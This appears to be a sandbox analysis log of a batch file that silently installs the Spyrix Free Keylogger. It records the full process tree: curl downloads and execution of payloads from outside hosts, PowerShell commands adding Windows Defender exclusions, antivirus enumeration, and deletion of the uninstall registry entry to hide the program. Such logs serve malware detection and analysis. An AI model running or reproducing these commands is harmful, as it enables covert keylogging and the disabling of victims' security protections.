Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: D0WmCTD2qO.bat ReversingLabs: Detection: 26%
Source: D0WmCTD2qO.bat Virustotal: Detection: 20%
Source: spkl.exe String found in binary or memory: NATS-SEFI-ADD
Source: spkl.exe String found in binary or memory: NATS-DANO-ADD
Source: spkl.exe String found in binary or memory: JIS_C6229-1984-b-add
Source: spkl.exe String found in binary or memory: jp-ocr-b-add
Source: spkl.exe String found in binary or memory: JIS_C6229-1984-hand-add
Source: spkl.exe String found in binary or memory: jp-ocr-hand-add
Source: spkl.exe String found in binary or memory: ISO_6937-2-add
Source: qrl.exe String found in binary or memory: Unable to complete request for channel-process-startup
Source: qrl.exe String found in binary or memory: dns-ipv6-addr
Source: qrl.exe String found in binary or memory: dns-ipv4-addr
Source: qrl.exe String found in binary or memory: false-start
Source: qrl.exe String found in binary or memory: --dns-ipv4-addr <address>
Source: qrl.exe String found in binary or memory: --dns-ipv6-addr <address>
Source: qrl.exe String found in binary or memory: --false-start
Source: qrl.exe String found in binary or memory: -h, --help
Source: qrl.exe String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe String found in binary or memory: id-cmc-addExtensions
Source: qrl.exe String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: qrl.exe String found in binary or memory: set-addPolicy
Source: qrl.exe String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\D0WmCTD2qO.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe Process created: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp" /SL5="$30462,32862490,227328,C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,17144999493896228581,15445594864361974383,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe Process created: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp" /SL5="$30462,32862490,227328,C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
